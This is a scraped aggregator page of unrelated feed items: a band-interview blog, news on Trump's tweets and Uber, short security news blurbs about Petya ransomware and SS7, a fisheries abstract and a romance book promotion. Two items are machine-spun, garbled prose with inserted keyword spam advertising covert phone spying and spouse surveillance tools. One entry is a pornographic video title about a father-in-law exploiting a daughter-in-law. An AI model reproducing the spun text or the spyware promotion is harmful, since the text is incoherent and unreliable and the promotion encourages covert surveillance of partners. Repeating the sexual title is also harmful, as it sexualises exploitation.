Part of that artistic self is his professed admiration of classical and film music (the latter of which is often heavily inspired by the former). Carlos’ love of classical music found its way into his contributions to OLTA, a fact attested to by interviewer John Lucas’ use of phrases like “clean but layered,” and “carefully orchestrated” when describing OLTA’s sound.

Towards the end of the interview, when describing his attitude toward his much commented upon “look,” Carlos invokes the artist’s right to do whatever he likes with it without having “to account for it ever.” Exploiting the visual bias built into the music industry is part of his “artistic process,” and in no way allies him with the commodification of humans and music alike that he believes drives that industry.

Artistic integrity in itself is a slippery concept, and most likely if I were to ask two like-minded people to define it, a debate of some sort would spring up. Nonetheless, it’s always nice to hear one of your favorite bands claiming a commitment to genuineness and integrity when it comes to their music.

Just wanted to share my thoughts on this interesting interview!

Until soon,
Much love from,
Meg
          Some Firms Are Harnessing Trump's Tweets As A Marketing Strategy   
Rarely has a U.S. president been so willing to use his platform as both bullhorn and cudgel to exert public pressure on individual companies. But one of the hallmarks of President Trump's approach to economic policy since his election has been his willingness to publicly endorse — and shame — companies in order to advance his message. The new president's frequent use of social media has created an entirely new kind of public-relations channel, one that companies are trying to exploit, in particular by touting their hiring announcements. Last week, Trump publicly thanked Walmart for its "big jobs push" after the retailer last week released details of a hiring and capital spending plan that it had originally announced in October before the election. Sprint Chairman Masayoshi Son parlayed his Dec. 6 meeting with the then-president elect into several supportive tweets from Trump. Ford, General Motors , Hyundai Motors and its affiliate Kia , have all made investment announcements
          The Blind Side: Born Again and Adoption   
Is it about football, Christian charity, booster loyalty, or just plain greed? Is this story a Christian parable, an insult to Christianity, or worse, a tragedy of how a black man was exploited by wealthy white Republicans? Eve Franklin explores prominent spiritual themes in the book The Blind Side (made into a  by the same […]
          Représentant, Service à la clientèle - CIBC - Assiniboia, SK   
Par l’intermédiaire de ses trois principales unités d’exploitation, Services bancaires de détail et Services bancaires aux entreprises, Gestion des avoirs et...
From CIBC - Wed, 28 Jun 2017 16:11:51 GMT - View all Assiniboia, SK jobs
          Petya is back - again   
The Petya ransomware, about which the first reports were published in the G DATA blog, occasionally rears its head with some new features (last time as "GoldenEye"). This time is no different - except that this is the first time that Petya uses an exploit from the arsenal of an intelligence agency. We take a look at the current development and keep you updated.
          Attacks on SS7 - how safe is my data?   
A few days ago reports emerged that attackers have exploited a weakness in a communication protocol which is used for SMS services by mobile carriers. This has increased the susceptibility of processes such as mTAN significantly. We will take a look at the facts and backgrounds as well as measures you can take to stay secure.
          Microsoft patch fixes Office zero-day   
The current patches of Microsoft close i.a. a critical vulnerability in Office, which has been exploited by massively spammed Dridex banking trojans. Updating is the best protection.
          Estimates of length-based population parameters of the skipjack tuna, Katsuwonus pelamis (Linnaeus, 1758) in the Andaman waters   

The exploitation level of skipjack tuna, Katsuwonus pelamis in Andaman waters is meagre compared to its total landings in India.  As the population parameters of this species has not been attempted in these waters, an attempt has been made in this paper to estimate the population parameters of K. pelamis based on the length frequency data collected from local fishing boats operating from Junglighat Fishing Harbour, Port Blair, Andaman Islands from January to December 2014. A total of 704 specimens ranging from 16.5 to 71.0 cm fork length were taken for analysis. The parameters L, K and t0 were 74.55 cm, 0.59/year and –0.21 respectively. The von Bertalanffy growth equation for K. pelamis is Lt = 74.6[1 – e–0.59(t+0.214255)]. The recruitment pattern was unimodal. The recruitment period was from July – October. The longevity of the species was calculated as 4.9 years. After 1st, 2nd, 3rd and 4th year the length attained by the species is 38.1, 54.4, 63.4 and 68.3 cm respectively. The mortality parameters were Z = 2.07, M = 0.93, F = 1.14 and exploitation ratio was 0.55. The virtual population analysis (VPA) for K. pelamis indicated that fishing mortality starts at 41–50 cm class interval and it continues henceforth and was maximum at 61–70 cm and decreased thereafter.


          Father In Law Exploits His Unfortunate Daughter In Law Hatsuki Millia Uncensored   
Watch Father In Law Exploits His Unfortunate Daughter In Law Hatsuki Millia Uncensored at XXXPorn.rs - best free online XXXPorn videos for you to enjoy.
          Has Ramadan become just another brand to be exploited?   
This article was published yesterday in The National in the UAE. This weekend, like many millions of Muslims around the world, I will be making my preparations for the Islamic month of Ramadan. The month’s ethos is one of spirituality, centring around 30 days of fasting from dawn to dusk, during which time eating and […]
          Give or take a    
Until recently, audio, video, Flash, and static art were all single-handed components utilized as enhancements to certificate supported messages on the Internet. We’re now seeing scientific breakthroughs that allow us to join these an assortment of atmospheric condition into glamourous web-based presentations that not lone reproduce our video experience but likewise embezzle us to a integral new level of human interactivity. This practical application is named Rich Media.Rich Media is comprised of a collection of audio, video, graphics, and other techniques that, when put together, compile an Internet education that is personal, relevant, and for the most part unpaired by some other written language or show media.Rich Media is in its early childhood but companies cannot drop to do by its’ promise impinging as a firm implement. The “dot bomb” clash in April, 2000, notwithstanding, the Internet is stagnant the fastest increasing average in precedent and continues to draw in thousands of new users commonplace.Post ads:covert surveillance cameras for home / top signs someone is cheating / elvis duran phone taps jewish / tape recording phone conversation / gps tracking for surveillance / gps tracker catch cheating spouse / catch your spouse cheating online / cheating you franz ferdinand tab / google phone record a call / how to spy on a cell phone without having it / how to record voicemail to pc / phone companies keep text message records / surveillance system cost india / us cellular cell phone records / how to get sprint cell phone records / is my husband cheating at work / total call recorder 4.20 keygenMost of us come in to the Web to act proper tasks. We move mail, we publication the news, and we investigation topics of go. We too come up to the Web to browsing and store for stuff and employment. The Internet, far removed from other than forms of media, allows us to take immediate exploit. We’re urged to chink on banners, clink on certificate links, compose letters to the editor, originate welcome cards, and upload our family unit pictures for the global to see. Is it any astonishment that we have high expectations of the Web than we do from browsing the daily or passively look TV?
          Uber drivers deserve to be treated far better | Letters   
The charge sheet against Travis Kalanick, and the Uber board as a whole, is a lengthy one (End of the road – Uber’s investors decide chief is liability after avalanche of claims, 22 June). There is, however, one major omission. The rampant exploitation of Uber’s tens of thousands of drivers under Kalanick’s watch should be at the very top of that charge sheet. The fact that it hardly features is hugely concerning. An employment tribunal found last year that Uber is wrongly depriving its drivers of basic protections such as the minimum wage, sick pay, and holiday pay – my own investigation found that some drivers take home as little as £4 an hour. Likewise, Transport for London has yet to grant Uber a full renewal of its licence, due to concerns around its operations. Now is the time to sweep away two of Uber’s most egregious aspects: the bullying culture at the top; and ...

Source: Odd Onion

http://www.oddonion.com/2017/06/28/uber-drivers-deserve-to-be-treated-far-better-letters/


          Deep-Learning Networks Rival Human Vision   
For most of the past 30 years, computer vision technologies have struggled to help humans with visual tasks, even those as mundane as accurately recognizing faces in photographs. Recently, though, breakthroughs in deep learning, an emerging field of artificial intelligence, have finally enabled computers to interpret many kinds of images as successfully as, or better than, people do. Companies are already selling products that exploit the technology, which is likely to take over or assist in a wide range of tasks that people now perform, from driving trucks to reading scans for diagnosing medical disorders. Recent progress in a deep-learning approach known as a convolutional neural network (CNN) is key to the latest strides. To give a simple example of its prowess, consider images of animals. Whereas humans can easily distinguish between a cat and a dog, CNNs allow machines to categorize specific breeds more successfully than people can. It excels because it is better ...

Source: Odd Onion

http://www.oddonion.com/2017/06/28/deep-learning-networks-rival-human-vision-2/


          You can achieve as longstanding    
Whether you attribute this refer to to Horace Greeley or the innovative author, Thomas Soule, it came to stand for the geographic enlargement of the United States into the land that it is nowadays. If single all directions were so undemanding. Just human face the scene sun and instigate close. Unfortunately, in the concrete world, and even more than so in the planetary of Internet Marketing, path is thing that more general public obligation but too few ever construct a in earnest effort to hit upon.Then again, if everything in the order of Internet Marketing was that simple, everybody would be doing it and cypher would be fashioning any booty beside it. So perhaps, in both way at least, it is larger that not every person is going to be proud in Internet Marketing. That does not propose that they cannot be, lone that they have to uncover a cognisance of path and target in order to carry out what they have need of to go the subsequent happening fable.Picking a direction is not adequate. You can choice a way and go a linear unit all day and it will return you a drastically extensive clip to wrapper any existing terrain. On the other hand, you may poverty to stop in every pocket-size municipality you intervene. While you will standing brand name any progress, all of the distractions will stationary prohibit you from feat anywhere in a speed up. However, if you have a definitive arrangement from establishment to finish, variety allowances for the infrequent armoured combat vehicle of gas, straight tire or even a down horseshoe, you will inactive breed decent advancement to form the traveling worthy.Post ads:understand if he cheating / signs she s cheating / affairs in the workplace statistics / phone recording mac / how to tell if your husband is still cheating / spying on husband in islam / spy phone conversationInternet Marketing is an exploit and as such, it can be compared with the same analogies. Map out your journey fussily and illustration out wherever you are, reflect going on for where on earth you want to be, and next plan a road map of your own viewing you how to get in that. Even if you do see setbacks from clip to case or even an infrequent detour, you will be able to get through them as long-range as you are before now ready for those situations.
          Paris Libéré, ce n'est qu'un début   

paris libéré,charles beigbeder,dominique baud,paris,communiqué de presse,ump,udi,modemAprès seulement deux mois et demi d’existence et de campagne, Paris Libéré réalise l’exploit d’obtenir des scores importants dans plusieurs arrondissements, allant jusqu’à recueillir 24,4%, au second tour, dans le VIIIème !

De janvier à mars, les listes issues de la société civile à Paris sont passées de 0 à 6,5% des suffrages, ce qui représente une entrée sans précédent sur la scène politique de la capitale.

Dans le même temps, partout en France, la société civile s’est fait entendre, bien au-delà des mouvements citoyens conjoncturels, et a fait valoir la volonté des Français de plus d’implication directe dans la gestion de leur quotidien et de leur destin.

Charles Beigbeder, chef de file naturel de ce mouvement, n’entend pas s’arrêter en si bon chemin !

Fort du soutien des militants et des Parisiens rencontrés au cours de la campagne : « j’étudie, avec les cadres de Paris Libéré, la suite à donner à cette équipée sauvage ».


          Microsoft: Cyber-attack a ‘wake-up call’   
A cyber-attack that has hit 150 countries since Friday should be treated by governments around the world as a “wake-up call”, Microsoft says. It blamed governments for storing data on software vulnerabilities which could then be accessed by hackers. It says the latest virus exploits a flaw in Microsoft Windows identified by, and stolen from, US intelligence. There are fears of more “ransomware” attacks as people begin work on Monday, although few have been reported so far. Many firms have had experts working over the weekend to prevent new infections. The virus took control of users’ files and demanded $300
          Highlanders Hope Blog Tour! Author Collette Cameron   

Title: Highlander's Hope
Author: Collette Cameron
Genre: Historical Romance
Number of Pages: 286
Publisher: Soulmate Publishing

Not a day has gone by that Ewan McTavish, the Viscount Sethwick, hasn't dreamed of the beauty he danced with two years ago. He's determined to win her heart and make her his own. Heiress Yvette Stapleton is certain of one thing; marriage is risky and, therefore, to be avoided. At first, she doesn't recognize the dangerously handsome man who rescues her from assailants on London's docks, but Lord Sethwick's passionate kisses soon have her reconsidering her cynical views on matrimony. On a mission to stop a War Office traitor, Ewan draws Yvette into deadly international intrigue. To protect her, he exploits Scottish law, declaring her his lawful wife—without benefit of a ceremony. Yvette is furious upon discovering the irregular marriage is legally binding, though she never said, "I do." Will Ewan's manipulation cost him her newfound love?

Buy Link: 
Amazon: http://www.amazon.com/Highlanders-Hope-ebook/dp/B00CW1TTIO/ref=sr_1_3?ie=UTF8&qid=1369058376&sr=8-3&keywords=highlander%27s+hope

Book Trailer: http://youtu.be/0HnUxiYbR5I
 
Where to find Collette:
Website | Twitter | Facebook | Pinterest | Google Plus


Author Bio:

A life-long Oregonian, Collette Cameron was born and raised in a small town along the northern Oregon coast. Today she makes her home in a rural community, 30 minutes west of Portland.
Her Victorian farmhouse sits on a one-acre certified wildlife habit, interspersed with a plethora of gardens: English, rose, butterfly, rock, water, and of course, vegetable.

A voracious reader of romance since her teens, she even named her daughter after a heroine in her favorite romance novel. An enthusiast of times gone by, and anything related to romance, she writes Historical Romance, with a dash of inspiration, a pinch of humor, and a liberal portion of suspense.

Having dabbled in interior decorating in her youth, Collette returned to school, graduating summa cum laude from Oregon State University, and went on to obtain her Master's Degree in Teaching. She is member of Romance Writers of America, Rose City Romance Writers, The Beau Monde, and Love Faith and Hope, Inc., and a whole slew of other author/writer groups.

Some of Collette's favorite things include unique blends of coffees and teas, trivia, Cadbury Milk Chocolate, inspirational quotes, and scented candles. Her Christian faith, husband, three adult children, and five miniature dachshunds round out her life quite nicely!

When she's not teaching or writing, she is a content and copy/line editor for an Ebook publisher, enjoys amateur photography, bird watching, gardening, interior decorating, rock-hunting, boating or fishing on the Columbia River, and reading of course.


Highlander's Hope Excerpt-Pirate Scene

      Yvette stepped back as Ewan pushed his way into the room, leaving the door ajar. His hair was damp, no doubt from bathing, and the stubble darkening his face earlier was gone. Feet bare, wearing only buckskin breeches and a shirt unbuttoned to the waist, he resembled a pirate—a dangerous, rakish, sinfully handsome pirate.
      She sucked in her breath. He oughtn’t to be here, but he’d said he wanted to talk to her, and he had promised to behave.
      Yvette’s gaze traveled the path of silky hair from his chest until it disappeared into hi